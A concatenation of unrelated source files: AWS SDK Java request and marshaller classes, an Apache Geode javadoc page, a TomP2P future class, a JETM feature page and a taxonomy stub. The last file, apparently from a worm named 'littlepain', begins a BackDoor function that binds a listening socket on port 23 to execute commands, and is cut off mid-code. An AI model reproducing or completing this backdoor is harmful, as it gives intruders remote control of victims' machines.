* href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>.
*/
public String getConfiguration() {
return this.configuration;
}
/**
* <p>
* Crawler configuration information. This versioned JSON string allows users to specify aspects of a crawler's
* behavior. For more information, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>.
* </p>
*
* @param configuration
* Crawler configuration information. This versioned JSON string allows users to specify aspects of a
* crawler's behavior. For more information, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withConfiguration(String configuration) {
setConfiguration(configuration);
return this;
}
/**
* <p>
* The name of the <code>SecurityConfiguration</code> structure to be used by this crawler.
* </p>
*
* @param crawlerSecurityConfiguration
* The name of the <code>SecurityConfiguration</code> structure to be used by this crawler.
*/
public void setCrawlerSecurityConfiguration(String crawlerSecurityConfiguration) {
this.crawlerSecurityConfiguration = crawlerSecurityConfiguration;
}
/**
* <p>
* The name of the <code>SecurityConfiguration</code> structure to be used by this crawler.
* </p>
*
* @return The name of the <code>SecurityConfiguration</code> structure to be used by this crawler.
*/
public String getCrawlerSecurityConfiguration() {
return this.crawlerSecurityConfiguration;
}
/**
* <p>
* The name of the <code>SecurityConfiguration</code> structure to be used by this crawler.
* </p>
*
* @param crawlerSecurityConfiguration
* The name of the <code>SecurityConfiguration</code> structure to be used by this crawler.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withCrawlerSecurityConfiguration(String crawlerSecurityConfiguration) {
setCrawlerSecurityConfiguration(crawlerSecurityConfiguration);
return this;
}
/**
* <p>
* The tags to use with this crawler request. You may use tags to limit access to the crawler. For more information
* about tags in Glue, see <a href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web
* Services Tags in Glue</a> in the developer guide.
* </p>
*
* @return The tags to use with this crawler request. You may use tags to limit access to the crawler. For more
* information about tags in Glue, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web Services Tags in Glue</a>
* in the developer guide.
*/
public java.util.Map<String, String> getTags() {
return tags;
}
/**
* <p>
* The tags to use with this crawler request. You may use tags to limit access to the crawler. For more information
* about tags in Glue, see <a href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web
* Services Tags in Glue</a> in the developer guide.
* </p>
*
* @param tags
* The tags to use with this crawler request. You may use tags to limit access to the crawler. For more
* information about tags in Glue, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web Services Tags in Glue</a>
* in the developer guide.
*/
public void setTags(java.util.Map<String, String> tags) {
this.tags = tags;
}
/**
* <p>
* The tags to use with this crawler request. You may use tags to limit access to the crawler. For more information
* about tags in Glue, see <a href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web
* Services Tags in Glue</a> in the developer guide.
* </p>
*
* @param tags
* The tags to use with this crawler request. You may use tags to limit access to the crawler. For more
* information about tags in Glue, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web Services Tags in Glue</a>
* in the developer guide.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withTags(java.util.Map<String, String> tags) {
setTags(tags);
return this;
}
/**
* Add a single Tags entry
*
* @see CreateCrawlerRequest#withTags
     * @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest addTagsEntry(String key, String value) {
if (null == this.tags) {
this.tags = new java.util.HashMap<String, String>();
}
if (this.tags.containsKey(key))
throw new IllegalArgumentException("Duplicated keys (" + key.toString() + ") are provided.");
this.tags.put(key, value);
return this;
}
/**
* Removes all the entries added into Tags.
*
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest clearTagsEntries() {
this.tags = null;
return this;
}
/**
* Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be
* redacted from this string using a placeholder value.
*
* @return A string representation of this object.
*
* @see java.lang.Object#toString()
*/
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("{");
if (getName() != null)
sb.append("Name: ").append(getName()).append(",");
if (getRole() != null)
sb.append("Role: ").append(getRole()).append(",");
if (getDatabaseName() != null)
sb.append("DatabaseName: ").append(getDatabaseName()).append(",");
if (getDescription() != null)
sb.append("Description: ").append(getDescription()).append(",");
if (getTargets() != null)
sb.append("Targets: ").append(getTargets()).append(",");
if (getSchedule() != null)
sb.append("Schedule: ").append(getSchedule()).append(",");
if (getClassifiers() != null)
sb.append("Classifiers: ").append(getClassifiers()).append(",");
if (getTablePrefix() != null)
sb.append("TablePrefix: ").append(getTablePrefix()).append(",");
if (getSchemaChangePolicy() != null)
sb.append("SchemaChangePolicy: ").append(getSchemaChangePolicy()).append(",");
if (getRecrawlPolicy() != null)
sb.append("RecrawlPolicy: ").append(getRecrawlPolicy()).append(",");
if (getLineageConfiguration() != null)
sb.append("LineageConfiguration: ").append(getLineageConfiguration()).append(",");
if (getLakeFormationConfiguration() != null)
sb.append("LakeFormationConfiguration: ").append(getLakeFormationConfiguration()).append(",");
if (getConfiguration() != null)
sb.append("Configuration: ").append(getConfiguration()).append(",");
if (getCrawlerSecurityConfiguration() != null)
sb.append("CrawlerSecurityConfiguration: ").append(getCrawlerSecurityConfiguration()).append(",");
if (getTags() != null)
sb.append("Tags: ").append(getTags());
sb.append("}");
return sb.toString();
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (obj instanceof CreateCrawlerRequest == false)
return false;
CreateCrawlerRequest other = (CreateCrawlerRequest) obj;
if (other.getName() == null ^ this.getName() == null)
return false;
if (other.getName() != null && other.getName().equals(this.getName()) == false)
return false;
if (other.getRole() == null ^ this.getRole() == null)
return false;
if (other.getRole() != null && other.getRole().equals(this.getRole()) == false)
return false;
if (other.getDatabaseName() == null ^ this.getDatabaseName() == null)
return false;
if (other.getDatabaseName() != null && other.getDatabaseName().equals(this.getDatabaseName()) == false)
return false;
if (other.getDescription() == null ^ this.getDescription() == null)
return false;
if (other.getDescription() != null && other.getDescription().equals(this.getDescription()) == false)
return false;
if (other.getTargets() == null ^ this.getTargets() == null)
return false;
if (other.getTargets() != null && other.getTargets().equals(this.getTargets()) == false)
return false;
if (other.getSchedule() == null ^ this.getSchedule() == null)
return false;
if (other.getSchedule() != null && other.getSchedule().equals(this.getSchedule()) == false)
return false;
if (other.getClassifiers() == null ^ this.getClassifiers() == null)
return false;
if (other.getClassifiers() != null && other.getClassifiers().equals(this.getClassifiers()) == false)
return false;
if (other.getTablePrefix() == null ^ this.getTablePrefix() == null)
return false;
if (other.getTablePrefix() != null && other.getTablePrefix().equals(this.getTablePrefix()) == false)
return false;
if (other.getSchemaChangePolicy() == null ^ this.getSchemaChangePolicy() == null)
return false;
if (other.getSchemaChangePolicy() != null && other.getSchemaChangePolicy().equals(this.getSchemaChangePolicy()) == false)
return false;
if (other.getRecrawlPolicy() == null ^ this.getRecrawlPolicy() == null)
return false;
if (other.getRecrawlPolicy() != null && other.getRecrawlPolicy().equals(this.getRecrawlPolicy()) == false)
return false;
if (other.getLineageConfiguration() == null ^ this.getLineageConfiguration() == null)
return false;
if (other.getLineageConfiguration() != null && other.getLineageConfiguration().equals(this.getLineageConfiguration()) == false)
return false;
if (other.getLakeFormationConfiguration() == null ^ this.getLakeFormationConfiguration() == null)
return false;
if (other.getLakeFormationConfiguration() != null && other.getLakeFormationConfiguration().equals(this.getLakeFormationConfiguration()) == false)
return false;
if (other.getConfiguration() == null ^ this.getConfiguration() == null)
return false;
if (other.getConfiguration() != null && other.getConfiguration().equals(this.getConfiguration()) == false)
return false;
if (other.getCrawlerSecurityConfiguration() == null ^ this.getCrawlerSecurityConfiguration() == null)
return false;
if (other.getCrawlerSecurityConfiguration() != null && other.getCrawlerSecurityConfiguration().equals(this.getCrawlerSecurityConfiguration()) == false)
return false;
if (other.getTags() == null ^ this.getTags() == null)
return false;
if (other.getTags() != null && other.getTags().equals(this.getTags()) == false)
return false;
return true;
}
@Override
public int hashCode() {
final int prime = 31;
int hashCode = 1;
hashCode = prime * hashCode + ((getName() == null) ? 0 : getName().hashCode());
hashCode = prime * hashCode + ((getRole() == null) ? 0 : getRole().hashCode());
hashCode = prime * hashCode + ((getDatabaseName() == null) ? 0 : getDatabaseName().hashCode());
hashCode = prime * hashCode + ((getDescription() == null) ? 0 : getDescription().hashCode());
hashCode = prime * hashCode + ((getTargets() == null) ? 0 : getTargets().hashCode());
hashCode = prime * hashCode + ((getSchedule() == null) ? 0 : getSchedule().hashCode());
hashCode = prime * hashCode + ((getClassifiers() == null) ? 0 : getClassifiers().hashCode());
hashCode = prime * hashCode + ((getTablePrefix() == null) ? 0 : getTablePrefix().hashCode());
hashCode = prime * hashCode + ((getSchemaChangePolicy() == null) ? 0 : getSchemaChangePolicy().hashCode());
hashCode = prime * hashCode + ((getRecrawlPolicy() == null) ? 0 : getRecrawlPolicy().hashCode());
hashCode = prime * hashCode + ((getLineageConfiguration() == null) ? 0 : getLineageConfiguration().hashCode());
hashCode = prime * hashCode + ((getLakeFormationConfiguration() == null) ? 0 : getLakeFormationConfiguration().hashCode());
hashCode = prime * hashCode + ((getConfiguration() == null) ? 0 : getConfiguration().hashCode());
hashCode = prime * hashCode + ((getCrawlerSecurityConfiguration() == null) ? 0 : getCrawlerSecurityConfiguration().hashCode());
hashCode = prime * hashCode + ((getTags() == null) ? 0 : getTags().hashCode());
return hashCode;
}
@Override
public CreateCrawlerRequest clone() {
return (CreateCrawlerRequest) super.clone();
}
}
| aws/aws-sdk-java | aws-java-sdk-glue/src/main/java/com/amazonaws/services/glue/model/CreateCrawlerRequest.java | Java | apache-2.0 | 36,471 |
/*
* Copyright 2017-2022 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*/
package com.amazonaws.services.cloudwatch.model.transform;
import javax.annotation.Generated;
import com.amazonaws.SdkClientException;
import com.amazonaws.Request;
import com.amazonaws.DefaultRequest;
import com.amazonaws.http.HttpMethodName;
import com.amazonaws.services.cloudwatch.model.*;
import com.amazonaws.transform.Marshaller;
import com.amazonaws.util.StringUtils;
/**
* ListDashboardsRequest Marshaller
*/
@Generated("com.amazonaws:aws-java-sdk-code-generator")
public class ListDashboardsRequestMarshaller implements Marshaller<Request<ListDashboardsRequest>, ListDashboardsRequest> {
public Request<ListDashboardsRequest> marshall(ListDashboardsRequest listDashboardsRequest) {
if (listDashboardsRequest == null) {
throw new SdkClientException("Invalid argument passed to marshall(...)");
}
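        // CloudWatch uses the Query protocol: the operation and its inputs are marshalled as
        // form parameters (Action/Version plus one entry per non-null request field).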
Request<ListDashboardsRequest> request = new DefaultRequest<ListDashboardsRequest>(listDashboardsRequest, "AmazonCloudWatch");
request.addParameter("Action", "ListDashboards");
request.addParameter("Version", "2010-08-01");
request.setHttpMethod(HttpMethodName.POST);
if (listDashboardsRequest.getDashboardNamePrefix() != null) {
request.addParameter("DashboardNamePrefix", StringUtils.fromString(listDashboardsRequest.getDashboardNamePrefix()));
}
if (listDashboardsRequest.getNextToken() != null) {
request.addParameter("NextToken", StringUtils.fromString(listDashboardsRequest.getNextToken()));
}
return request;
}
}
| aws/aws-sdk-java | aws-java-sdk-cloudwatch/src/main/java/com/amazonaws/services/cloudwatch/model/transform/ListDashboardsRequestMarshaller.java | Java | apache-2.0 | 2,151 |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_66-internal) on Wed Apr 13 11:47:04 PDT 2016 -->
<title>ManagementException (Apache Geode 1.0.0-incubating.M2)</title>
<meta name="date" content="2016-04-13">
<link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="ManagementException (Apache Geode 1.0.0-incubating.M2)";
}
}
catch(err) {
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../index-all.html">Index</a></li>
<li><a href="../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../com/gemstone/gemfire/management/LockServiceMXBean.html" title="interface in com.gemstone.gemfire.management"><span class="typeNameLink">Prev Class</span></a></li>
<li><a href="../../../../com/gemstone/gemfire/management/ManagementService.html" title="class in com.gemstone.gemfire.management"><span class="typeNameLink">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../index.html?com/gemstone/gemfire/management/ManagementException.html" target="_top">Frames</a></li>
<li><a href="ManagementException.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor.summary">Constr</a> | </li>
<li><a href="#methods.inherited.from.class.com.gemstone.gemfire.GemFireException">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor.detail">Constr</a> | </li>
<li>Method</li>
</ul>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">com.gemstone.gemfire.management</div>
<h2 title="Class ManagementException" class="title">Class ManagementException</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li>java.lang.Throwable</li>
<li>
<ul class="inheritance">
<li>java.lang.Exception</li>
<li>
<ul class="inheritance">
<li>java.lang.RuntimeException</li>
<li>
<ul class="inheritance">
<li><a href="../../../../com/gemstone/gemfire/GemFireException.html" title="class in com.gemstone.gemfire">com.gemstone.gemfire.GemFireException</a></li>
<li>
<ul class="inheritance">
<li>com.gemstone.gemfire.management.ManagementException</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<dl>
<dt>All Implemented Interfaces:</dt>
<dd>java.io.Serializable</dd>
</dl>
<dl>
<dt>Direct Known Subclasses:</dt>
<dd><a href="../../../../com/gemstone/gemfire/management/AlreadyRunningException.html" title="class in com.gemstone.gemfire.management">AlreadyRunningException</a></dd>
</dl>
<hr>
<br>
<pre>public class <span class="typeNameLabel">ManagementException</span>
extends <a href="../../../../com/gemstone/gemfire/GemFireException.html" title="class in com.gemstone.gemfire">GemFireException</a></pre>
<div class="block">A <code>ManagementException</code> is a general exception that may be thrown
when any administration or monitoring operation on a GemFire component
fails.
Various management and monitoring exceptions are wrapped in
 <code>ManagementException</code>s.</div>
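<div class="block">A minimal sketch of catching this exception (the management call shown is a hypothetical placeholder):
<pre>try {
    someManagementOperation();
} catch (ManagementException e) {
    // The wrapped cause, if any, is available via getCause().
}</pre></div>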
<dl>
<dt><span class="simpleTagLabel">Since:</span></dt>
<dd>7.0</dd>
<dt><span class="seeLabel">See Also:</span></dt>
<dd><a href="../../../../serialized-form.html#com.gemstone.gemfire.management.ManagementException">Serialized Form</a></dd>
</dl>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor.summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><span class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException--">ManagementException</a></span>()</code>
<div class="block">Constructs a new exception with a <code>null</code> detail message.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colOne"><code><span class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException-java.lang.String-">ManagementException</a></span>(java.lang.String message)</code>
<div class="block">Constructs a new exception with the specified detail message.</div>
</td>
</tr>
<tr class="altColor">
<td class="colOne"><code><span class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException-java.lang.String-java.lang.Throwable-">ManagementException</a></span>(java.lang.String message,
java.lang.Throwable cause)</code>
<div class="block">Constructs a new ManagementException with the specified detail message and
cause.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colOne"><code><span class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException-java.lang.Throwable-">ManagementException</a></span>(java.lang.Throwable cause)</code>
<div class="block">Constructs a new ManagementException by wrapping the specified cause.</div>
</td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method.summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<ul class="blockList">
<li class="blockList"><a name="methods.inherited.from.class.com.gemstone.gemfire.GemFireException">
<!-- -->
</a>
<h3>Methods inherited from class com.gemstone.gemfire.<a href="../../../../com/gemstone/gemfire/GemFireException.html" title="class in com.gemstone.gemfire">GemFireException</a></h3>
<code><a href="../../../../com/gemstone/gemfire/GemFireException.html#getRootCause--">getRootCause</a></code></li>
</ul>
<ul class="blockList">
<li class="blockList"><a name="methods.inherited.from.class.java.lang.Throwable">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Throwable</h3>
<code>addSuppressed, fillInStackTrace, getCause, getLocalizedMessage, getMessage, getStackTrace, getSuppressed, initCause, printStackTrace, printStackTrace, printStackTrace, setStackTrace, toString</code></li>
</ul>
<ul class="blockList">
<li class="blockList"><a name="methods.inherited.from.class.java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor.detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="ManagementException--">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>ManagementException</h4>
<pre>public ManagementException()</pre>
<div class="block">Constructs a new exception with a <code>null</code> detail message. The
cause is not initialized, and may subsequently be initialized by a call to
<code>Throwable.initCause(java.lang.Throwable)</code>.</div>
</li>
</ul>
<a name="ManagementException-java.lang.String-">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>ManagementException</h4>
<pre>public ManagementException(java.lang.String message)</pre>
<div class="block">Constructs a new exception with the specified detail message. The cause is
not initialized and may subsequently be initialized by a call to
<code>Throwable.initCause(java.lang.Throwable)</code>.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>message</code> - The detail message.</dd>
</dl>
</li>
</ul>
<a name="ManagementException-java.lang.String-java.lang.Throwable-">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>ManagementException</h4>
<pre>public ManagementException(java.lang.String message,
java.lang.Throwable cause)</pre>
<div class="block">Constructs a new ManagementException with the specified detail message and
cause.
<p>
Note that the detail message associated with <code>cause</code> is
<i>not</i> automatically incorporated in this runtime exception's detail
message.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>message</code> - The detail message.</dd>
<dd><code>cause</code> - The cause of this exception or <code>null</code> if the cause is
unknown.</dd>
</dl>
</li>
</ul>
<a name="ManagementException-java.lang.Throwable-">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>ManagementException</h4>
<pre>public ManagementException(java.lang.Throwable cause)</pre>
<div class="block">Constructs a new ManagementException by wrapping the specified cause. The
detail for this exception will be null if the cause is null or
cause.toString() if a cause is provided.</div>
<dl>
<dt><span class="paramLabel">Parameters:</span></dt>
<dd><code>cause</code> - The cause of this exception or <code>null</code> if the cause is
unknown.</dd>
</dl>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../index-all.html">Index</a></li>
<li><a href="../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../com/gemstone/gemfire/management/LockServiceMXBean.html" title="interface in com.gemstone.gemfire.management"><span class="typeNameLink">Prev Class</span></a></li>
<li><a href="../../../../com/gemstone/gemfire/management/ManagementService.html" title="class in com.gemstone.gemfire.management"><span class="typeNameLink">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../index.html?com/gemstone/gemfire/management/ManagementException.html" target="_top">Frames</a></li>
<li><a href="ManagementException.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor.summary">Constr</a> | </li>
<li><a href="#methods.inherited.from.class.com.gemstone.gemfire.GemFireException">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor.detail">Constr</a> | </li>
<li>Method</li>
</ul>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
| azwickey-pivotal/oauth2-gemfire-sample | apache-geode-1.0.0-incubating.M2/javadoc/com/gemstone/gemfire/management/ManagementException.html | HTML | apache-2.0 | 13,502 |
/*
* Copyright 2013 Thomas Bocek
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package net.tomp2p.futures;
/**
 * A generic future that can be completed with an attached object.
*
* @author Thomas Bocek
*
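 * <p>
 * Minimal usage sketch (illustrative, using only methods defined in this class):
 *
 * <pre>{@code
 * FutureDone<String> f = new FutureDone<String>();
 * f.done("hello");        // marks the future as finished and notifies listeners
 * String s = f.object();  // retrieves the attachment, here "hello"
 * }</pre>
 *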
 * @param <K> the type of the attached object
*/
public class FutureDone<K> extends BaseFutureImpl<FutureDone<K>> {
    public static final FutureDone<Void> SUCCESS = new FutureDone<Void>().done();
private K object;
/**
     * Creates a new, not yet completed future.
*/
public FutureDone() {
self(this);
}
/**
* Set future as finished and notify listeners.
*
* @return This class
*/
public FutureDone<K> done() {
done(null);
return this;
}
/**
* Set future as finished and notify listeners.
*
* @param object
* An object that can be attached.
* @return This class
*/
public FutureDone<K> done(final K object) {
synchronized (lock) {
if (!completedAndNotify()) {
return this;
}
this.object = object;
this.type = BaseFuture.FutureType.OK;
}
notifyListeners();
return this;
}
/**
* @return The attached object
*/
public K object() {
synchronized (lock) {
return object;
}
}
}
| jonaswagner/TomP2P | core/src/main/java/net/tomp2p/futures/FutureDone.java | Java | apache-2.0 | 1,873 |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US">
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"/>
<title>Java(TM) Execution Time Measurement Library</title>
<link rel="stylesheet" type="text/css" href="default.css"/>
</head>
<body>
<div class="menu">
<a href="index.html">Home</a>
|
<a href="doc.html"><b>Documentation</b></a>
|
<a href="faq.html">FAQ</a>
|
<a href="../api/index.html">JavaDoc</a>
|
<a href="files.html"><b>Download</b></a>
|
<a href="svn.html">SVN</a>
|
<a href="http://sourceforge.net/mail/?group_id=109626">Mailing Lists</a>
|
<a href="http://sourceforge.net/projects/jetm/">Sourceforge Project Page</a>
</div>
<div id="content">
<div id="header">Java™ Execution Time Measurement Library</div>
<div id="subheader">Runtime performance monitoring made easy</div>
<div id="main">
<h3>JETM Featureset</h3>
<p>
The best way to explore JETM features is to look at the
<a href="http://jetm.void.fm/jetm-demo/">online demo application</a>. Nevertheless, this page lists
the current JETM feature set.
</p>
<h4>JETM Core Features</h4>
<ul>
<li>Declarative and programmatic performance monitoring</li>
<li>Flat and nested (tree-based) recording</li>
<li>Low overhead - can and <b>should</b> be used in production</li>
<li>Pluggable result visualization including HTML, Swing and Standard Out</li>
<li>Simple setup and integration</li>
<li>No VM level instrumentation requirement, JETM can and should be used per deployment unit</li>
<li>Persistent performance results</li>
</ul>
<h4>Supported JDKs (tested, but not limited to)</h4>
<ul>
<li>Sun JDK 1.3, 1.4, 5.0, 6.0</li>
<li>Bea JRockit</li>
</ul>
<h4>Supported timers</h4>
<ul>
<li>java.lang.System#nanoTime</li>
<li>sun.misc.Perf</li>
<li>java.lang.System#currentTimeMillis()</li>
</ul>
<h4>Framework integrations</h4>
<ul>
<li>Declarative performance monitoring using <a href="howto/spring_integration.html">Springframework</a> AOP,
<a href="howto/aspectwerkz_integration.html">AspectWerkz</a> and other AOP Alliance Frameworks
</li>
<li>Build-in <a href="howto/drop-in-console.html">HTTP Server</a> for performance monitoring</li>
<li>Raw Data Logging using <a href="http://logging.apache.org/log4j">Log4J</a>, <a
href="http://jakarta.apache.org/commons/logging/">commons-logging</a> and <i>java.util.logging</i></li>
<li>Result visualization using <a href="http://rrd4j.dev.java.net/">RRD4j</a></li>
<li>Simple JMX Integration</li>
</ul>
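<p>
For illustration, programmatic measurement with JETM typically follows the pattern
sketched below (a minimal sketch; the names follow the standard JETM API, so consult
the documentation pages for authoritative usage):
</p>
<pre>
EtmMonitor monitor = EtmManager.getEtmMonitor();
EtmPoint point = monitor.createPoint("businessOperation");
try {
    // code under measurement
} finally {
    point.collect();
}
</pre>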
</div>
</div>
<div class="menu">
<a href="index.html">Home</a>
|
<a href="doc.html"><b>Documentation</b></a>
|
<a href="faq.html">FAQ</a>
|
<a href="../api/index.html">JavaDoc</a>
|
<a href="files.html"><b>Download</b></a>
|
<a href="svn.html">SVN</a>
|
<a href="http://sourceforge.net/mail/?group_id=109626">Mailing Lists</a>
|
<a href="http://sourceforge.net/projects/jetm/">Sourceforge Project Page</a>
</div>
</body>
<!-- Last modified $Date: 2007-07-08 23:23:02 +0200 (So, 08 Jul 2007) $ -->
</html> | jasonwee/videoOnCloud | lib/jetm-1.2.3/doc/site/features.html | HTML | apache-2.0 | 3,392 |
# Manglietia dolichogyna Dandy ex Noot. SPECIES
#### Status
SYNONYM
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Magnoliales/Magnoliaceae/Magnolia/Magnolia utilis/ Syn. Manglietia dolichogyna/README.md | Markdown | apache-2.0 | 194 |
#include "littlepain.h"
/* the backdoor :) */
DWORD WINAPI BackDoor(LPVOID Data)
{
SOCKET server_sock,client_sock;
struct sockaddr_in serv_inf;
struct timeval tv;
fd_set ft;
char exec[MAX_PATH];
DWORD cnt;
STARTUPINFO inf_prog;
PROCESS_INFORMATION info_pr;
if((server_sock = socket(AF_INET,SOCK_STREAM,
IPPROTO_TCP)) == INVALID_SOCKET)
{
return 0;
}
serv_inf.sin_family = AF_INET;
serv_inf.sin_addr.s_addr = htonl(INADDR_ANY);
serv_inf.sin_port = htons(23);
if(bind(server_sock,(struct sockaddr *)&serv_inf,
